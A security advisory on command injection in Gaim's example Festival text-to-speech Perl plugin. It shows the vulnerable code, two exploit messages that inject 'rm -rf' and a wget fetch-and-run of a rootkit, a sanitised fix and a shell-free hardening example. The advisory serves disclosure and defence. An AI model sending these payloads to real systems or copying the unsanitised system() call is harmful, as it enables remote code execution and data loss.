Gaim is an all-in-one IM client that resembles AIM. Gaim lets you use AIM, ICQ, Yahoo, MSN, IRC, Jabber, Napster, Zephyr, and Gadu-Gadu, all at once. Gaim is NOT endorsed by or affiliated with AOL, Yahoo, MSN, or Napster. An example plugin provided by Gaim (which many copy-paste from) allows remote attackers to cause it to execute arbitrary code.
Credit:
The information has been provided by error.
Any plugin that copied its code from the example plugin contains a vulnerability that allows arbitrary code execution.
Vulnerable code (from the example plugin):
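# Register the plugin and hook every incoming instant message.
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
    AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
    my $string = $_[0];         # text received from the remote user
    $string =~ s/\<.*?\>//g;    # strip HTML tags
    $string =~ s/\".*\"//;      # removes only a paired "..." span; a single quote is left in place
    # VULNERABLE: the remote text is interpolated into a shell command line.
    system("echo \"$string\" | /usr/bin/festival --tts");
}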
As taken from:
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
As you can see, the system command is executed without adequately sanitizing the user-provided input: the message text is interpolated directly into a shell command line.
Exploit:
Just pass the plugin any of these messages (or really any message for that matter):
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x rootkit;./rootkit
Solution:
A fixed version of the example plugin would look like this:
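# Register the plugin and hook every incoming instant message.
AIM::register("Festival TTS", "0.0.1", "goodbye", "");
AIM::print("Perl Says", "Loaded Festival TTS");
AIM::command("idle", "60000") if ($pro ne "Offline");
AIM::add_event_handler("event_im_recv", "synthesize");
sub goodbye {
    AIM::print("Module Unloaded", "Unloaded Festival TTS");
}
sub synthesize {
    my $string = $_[0];         # text received from the remote user
    $string =~ s/\<.*?\>//g;    # strip HTML tags
    $string =~ s/\".*\"//;      # remove a paired "..." span
    # The fix: delete every character that is not a letter, digit or
    # underscore. This also removes spaces and punctuation.
    $string =~ s/[^\w]//g;
    system("echo \"$string\" | /usr/bin/festival --tts");
}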
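An alternative hardening, added here as an example (it is not part of the original advisory or of Gaim's own code): pass the message to festival on standard input through a list-form pipe open, so that no shell ever parses the text. The helper names clean_message and speak are assumptions, the AIM:: registration lines stay as shown above, and cat stands in for festival in the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: tidy the text for speech. This is defence in depth;
# the injection is prevented by speak() never invoking a shell.
sub clean_message {
    my ($string) = @_;
    $string =~ s/<.*?>//g;            # strip HTML tags, as the plugin does
    $string =~ s/[^\w\s.,!?'-]//g;    # allow-list: words, spaces, basic punctuation
    return $string;
}

# Hypothetical helper: write $text to the stdin of @cmd.
sub speak {
    my ($text, @cmd) = @_;
    local $SIG{PIPE} = 'IGNORE';      # a child that exits early must not kill the client
    # List-form pipe open: Perl executes @cmd directly, without /bin/sh,
    # so quotes and semicolons in $text are data, never shell syntax.
    open(my $tts, '|-', @cmd) or do {
        warn "cannot run $cmd[0]: $!\n";
        return 0;
    };
    print {$tts} $text, "\n";
    return close($tts) ? 1 : 0;       # false if the command exited non-zero
}

# Drop-in replacement for the handler registered with event_im_recv.
sub synthesize {
    return speak(clean_message($_[0]), '/usr/bin/festival', '--tts');
}

# Demo outside Gaim with a constructed message. 'cat' echoes exactly what
# the child process receives on stdin.
unless (caller) {
    my $msg = q{<b>Hello</b>"; echo INJECTED;};
    speak($msg, 'cat', '-');                  # raw text arrives verbatim, nothing runs
    speak(clean_message($msg), 'cat', '-');   # text after the allow-list
}
```

Unlike the `[^\w]` filter, this keeps spaces and sentence punctuation, so the spoken output stays intelligible.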